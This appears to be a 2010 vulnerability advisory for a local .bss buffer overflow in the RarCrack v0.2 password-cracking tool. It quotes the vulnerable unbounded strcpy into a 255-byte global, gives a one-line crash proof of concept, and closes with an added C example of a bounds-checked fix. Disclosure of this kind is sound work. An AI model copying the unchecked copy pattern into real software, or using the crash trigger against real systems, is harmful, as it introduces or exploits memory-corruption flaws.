The software can be downloaded here: http://rarcrack.sourceforge.net/
# Author: stoke
# Date: 2010-09-20
# Download: http://rarcrack.sourceforge.net/
# Tested on: Backtrack 4
#############################
Site: http://devilcode.it | http://hack2web.altervista.org
Special greetz to: nex, for reassuring me when I said "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!"
____ ___ __ __
/\ _`\ __/\_ \ /'__`\ /\ \
\ \ \/\ \ __ __ __/\_\//\ \ ___ /\ \/\ \ \_\ \ __ ___ _ __ __ __ __ __
\ \ \ \ \ /'__`\\ \/\ \/\ \\ \ \ /'___\ \ \ \ \ /'_` \ /'__`\ /'___\\`'__\'__`\\ \/\ \/\ \
\ \ \_\ \\ __/ \ \_/ | \ \\_\ \_/\ \__/\ \ \_\ \\ \L\ \/\ __/ /\ \__/ \ \/\ __/ \ \_/ \_/ \
\ \____/ \____\ \___/ \ \_\\____\ \____\\ \____/ \___,_\ \____\ \ \____\ \_\ \____\ \___x___/'
\/___/ \/____/\/__/ \/_//____/\/____/ \/___/ \/__,_ /\/____/ \/____/\/_/\/____/\/__//__/
Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
############################
RarCrack v0.2 bss overflow PoC
###########################################
Function affected: init();
Type: local;
Variable overflowed: filename;
###########################################
########################################################
Here we have:
----- Start useful code snip --------
char filename[255];
----- End useful code snip ----------
This variable is declared at file scope, above the "main" function, and left uninitialised, so it is a global and is allocated in .bss rather than on the stack.
In the init() function we have:
---- Start useful code snip ----
    if (strcmp(argv[i],"--help") == 0) {
        printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]\n\n");
        printf("Options: --help: show this screen.\n");
        printf("         --type: you can specify the archive program, this needed when\n");
        printf("                 the program couldn't detect the proper file type\n");
        printf("         --threads: you can specify how many threads\n");
        printf("                    will be run, maximum 12 (default: 2)\n\n");
        printf("Info: This program supports only RAR, ZIP and 7Z encrypted archives.\n");
        printf("      RarCrack! usually detects the archive type.\n\n");
        help = 1;
        break;
    } else if (strcmp(argv[i],"--threads") == 0) {
        if ((i + 1) < argc) {
            sscanf(argv[++i], "%d", &threads);
            if (threads < 1) threads = 1;
            if (threads > 12) {
                printf("INFO: number of threads adjusted to 12\n");
                threads = 12;
            }
        } else {
            printf("ERROR: missing parameter for option: --threads!\n");
            help = 1;
        }
    } else if (strcmp(argv[i],"--type") == 0) {
        if ((i + 1) < argc) {
            sscanf(argv[++i], "%s", &test);   /* "%s" without a field width: also an unbounded copy */
            for (j = 0; strcmp(TYPE[j], "") != 0; j++) {
                if (strcmp(TYPE[j], test) == 0) {
                    strcpy(finalcmd, CMD[j]);
                    archive_type = j;
                    break;
                }
            }
            if (archive_type < 0) {
                printf("WARNING: invalid parameter --type %s!\n", argv[i]);
                finalcmd[0] = '\0';
            }
        } else {
            printf("ERROR: missing parameter for option: --type!\n");
            help = 1;
        }
    } else {
        /* any argument that is not a recognised option lands here, unchecked */
        strcpy((char*)&filename, argv[i]);
---- Stop useful code snip ----
As you can see, at the end of this loop every argument that is not a recognised option is copied into our "filename" variable with strcpy, which does no bounds checking. filename holds 255 bytes including the terminating NUL, so any argument of 255 bytes or more overflows it and overwrites whatever the linker placed after it in .bss; with 500 bytes the program dies with a Segmentation Fault. Note that this is a .bss overflow, not a stack overflow: no saved return address is overwritten (which is why EIP does not change on the crash), and what gets corrupted is the adjacent global data, so what can be done with it depends entirely on which globals sit after filename in that binary.
###########################################################################
###########################################################################
PoC
./rarcrack `perl -e 'print "A" x500'`
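The following is an added example, not RarCrack's code: it rebuilds the shape of init()'s argument loop around a file-scope 255-byte buffer, keeps the original unbounded strcpy only as a reported check (would_overflow) instead of performing it, and shows the bounded replacement (set_filename) that rejects any positional argument that does not fit together with its NUL. The second global (finalcmd) is there only to show that what follows filename is other uninitialised global data; whether it is actually adjacent in a given binary is up to the linker, and the names and sizes here are assumptions for illustration.

```c
/* Added example (not the RarCrack source): the rarcrack option-loop pattern
 * with a bounded positional-argument copy. Globals and sizes are constructed
 * for illustration; only the 255-byte filename size comes from the advisory. */
#include <stdio.h>
#include <string.h>

#define FILENAME_SZ 255

/* File-scope and uninitialised, so both land in .bss like the original
 * filename[255]. Which one the linker places after filename is not
 * guaranteed; finalcmd is only a stand-in for "the next global". */
char filename[FILENAME_SZ];
char finalcmd[128];

/* Reports, without performing it, whether the original
 *   strcpy((char*)&filename, argv[i]);
 * would write past the end of filename (strlen + NUL > 255). */
int would_overflow(const char *arg)
{
    return strlen(arg) + 1 > sizeof filename;
}

/* Hardened replacement: reject anything that does not fit with its NUL.
 * Returns 0 on success, -1 if the argument is too long. */
int set_filename(const char *arg)
{
    size_t n = strlen(arg);
    if (n >= sizeof filename) {
        fprintf(stderr, "ERROR: archive name too long (%zu bytes, max %zu)\n",
                n, sizeof filename - 1);
        return -1;
    }
    memcpy(filename, arg, n + 1);   /* n + 1 <= sizeof filename by the check above */
    return 0;
}

/* Reduced version of init()'s loop: --threads handled as in the original
 * (clamped to 1..12, default 2), any other argument treated as the archive
 * name but bounds-checked. Returns 0 if a filename was set, -1 otherwise. */
int parse_args(int argc, char **argv, int *threads)
{
    *threads = 2;
    filename[0] = '\0';
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "--threads") == 0) {
            if (i + 1 >= argc)
                return -1;                      /* missing parameter */
            if (sscanf(argv[++i], "%d", threads) != 1)
                return -1;                      /* not a number */
            if (*threads < 1)  *threads = 1;
            if (*threads > 12) *threads = 12;
        } else if (set_filename(argv[i]) != 0) {
            return -1;                          /* would have overflowed */
        }
    }
    return filename[0] ? 0 : -1;
}

int main(int argc, char **argv)
{
    int threads;
    if (parse_args(argc, argv, &threads) != 0) {
        fprintf(stderr, "Usage: %s encrypted_archive.ext [--threads NUM]\n", argv[0]);
        return 1;
    }
    /* Show the .bss neighbourhood: an unbounded copy into filename would
     * spill into whatever global sits at the higher address. */
    printf("filename at %p, finalcmd at %p, threads=%d, archive=%s\n",
           (void *)filename, (void *)finalcmd, threads, filename);
    return 0;
}
```

Run it with the advisory's PoC argument, ``./a.out `perl -e 'print "A" x500'` ``, and the bounded version refuses the 500-byte name instead of crashing; with a normal archive name it prints the two global addresses so you can see how far apart filename and its neighbour were placed.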
###########################################################################